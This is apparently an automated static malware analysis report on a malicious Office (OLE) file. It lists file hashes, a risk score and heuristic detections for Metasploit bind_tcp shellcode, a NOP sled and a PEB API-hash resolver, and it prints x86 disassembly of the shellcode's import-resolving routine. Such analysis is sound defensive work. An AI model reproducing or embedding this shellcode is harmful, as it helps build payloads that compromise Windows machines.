Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eca6aaf7a0bcabac…

MALICIOUS

Office (OLE)

19.0 KB First seen: 2012-07-06
MD5: 557c318587dab6a0d5ecdcc132a0ae7d SHA-1: 77e46bc0453bbf9ec60a6bf28c864b70dd16a60c SHA-256: eca6aaf7a0bcabac2dbb88d4a30f28219d79ffd3d06612e9c0a96130436bd76a
180 Risk Score

Heuristics 4

  • Metasploit bind_tcp shellcode critical SC_MSF_BIND
    Metasploit bind_tcp shellcode
    Disassembly
    x86 disassembly · validity: code (0.864) — 11/11 branch targets land on an instruction boundary (100% coherence)
    00000637  fc                cld
00000638  e889000000        call 0x6c6
0000063D  60                pushal
0000063E  89e5              mov ebp, esp
00000640  31d2              xor edx, edx
00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
00000646  8b520c            mov edx, dword ptr [edx + 0xc]
00000649  8b5214            mov edx, dword ptr [edx + 0x14]
0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
00000653  31ff              xor edi, edi
00000655  31c0              xor eax, eax
00000657  ac                lodsb al, byte ptr [esi]
00000658  3c61              cmp al, 0x61
0000065A  7c02              jl 0x65e
0000065C  2c20              sub al, 0x20
0000065E  c1cf0d            ror edi, 0xd
00000661  01c7              add edi, eax
00000663  e2f0              loop 0x655
00000665  52                push edx
00000666  57                push edi
00000667  8b5210            mov edx, dword ptr [edx + 0x10]
0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
0000066D  01d0              add eax, edx
0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
00000672  85c0              test eax, eax
00000674  744a              je 0x6c0
00000676  01d0              add eax, edx
00000678  50                push eax
00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
0000067F  01d3              add ebx, edx
00000681  e33c              jecxz 0x6bf
00000683  49                dec ecx
00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000687  01d6              add esi, edx
00000689  31ff              xor edi, edi
0000068B  31c0              xor eax, eax
0000068D  ac                lodsb al, byte ptr [esi]
0000068E  c1cf0d            ror edi, 0xd
00000691  01c7              add edi, eax
00000693  38e0              cmp al, ah
00000695  75f4              jne 0x68b
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 78% of instructions — a sled or padding/filler run, not program logic).
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.862) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
00000646  8b520c            mov edx, dword ptr [edx + 0xc]
00000649  8b5214            mov edx, dword ptr [edx + 0x14]
0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
00000653  31ff              xor edi, edi
00000655  31c0              xor eax, eax
00000657  ac                lodsb al, byte ptr [esi]
00000658  3c61              cmp al, 0x61
0000065A  7c02              jl 0x65e
0000065C  2c20              sub al, 0x20
0000065E  c1cf0d            ror edi, 0xd
00000661  01c7              add edi, eax
00000663  e2f0              loop 0x655
00000665  52                push edx
00000666  57                push edi
00000667  8b5210            mov edx, dword ptr [edx + 0x10]
0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
0000066D  01d0              add eax, edx
0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
00000672  85c0              test eax, eax
00000674  744a              je 0x6c0
00000676  01d0              add eax, edx
00000678  50                push eax
00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
0000067F  01d3              add ebx, edx
00000681  e33c              jecxz 0x6bf
00000683  49                dec ecx
00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000687  01d6              add esi, edx
00000689  31ff              xor edi, edi
0000068B  31c0              xor eax, eax
0000068D  ac                lodsb al, byte ptr [esi]
0000068E  c1cf0d            ror edi, 0xd
00000691  01c7              add edi, eax
00000693  38e0              cmp al, ah
00000695  75f4              jne 0x68b
00000697  037df8            add edi, dword ptr [ebp - 8]
0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
0000069D  75e2              jne 0x681
0000069F  58                pop eax
000006A0  8b                .byte 0x8b
000006A1  58                pop eax
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (0.862) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
00000646  8b520c            mov edx, dword ptr [edx + 0xc]
00000649  8b5214            mov edx, dword ptr [edx + 0x14]
0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
00000653  31ff              xor edi, edi
00000655  31c0              xor eax, eax
00000657  ac                lodsb al, byte ptr [esi]
00000658  3c61              cmp al, 0x61
0000065A  7c02              jl 0x65e
0000065C  2c20              sub al, 0x20
0000065E  c1cf0d            ror edi, 0xd
00000661  01c7              add edi, eax
00000663  e2f0              loop 0x655
00000665  52                push edx
00000666  57                push edi
00000667  8b5210            mov edx, dword ptr [edx + 0x10]
0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
0000066D  01d0              add eax, edx
0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
00000672  85c0              test eax, eax
00000674  744a              je 0x6c0
00000676  01d0              add eax, edx
00000678  50                push eax
00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
0000067F  01d3              add ebx, edx
00000681  e33c              jecxz 0x6bf
00000683  49                dec ecx
00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000687  01d6              add esi, edx
00000689  31ff              xor edi, edi
0000068B  31c0              xor eax, eax
0000068D  ac                lodsb al, byte ptr [esi]
0000068E  c1cf0d            ror edi, 0xd
00000691  01c7              add edi, eax
00000693  38e0              cmp al, ah
00000695  75f4              jne 0x68b
00000697  037df8            add edi, dword ptr [ebp - 8]
0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
0000069D  75e2              jne 0x681
0000069F  58                pop eax
000006A0  8b                .byte 0x8b
000006A1  58                pop eax

Open this report in the interactive analyzer, or submit your own file for analysis.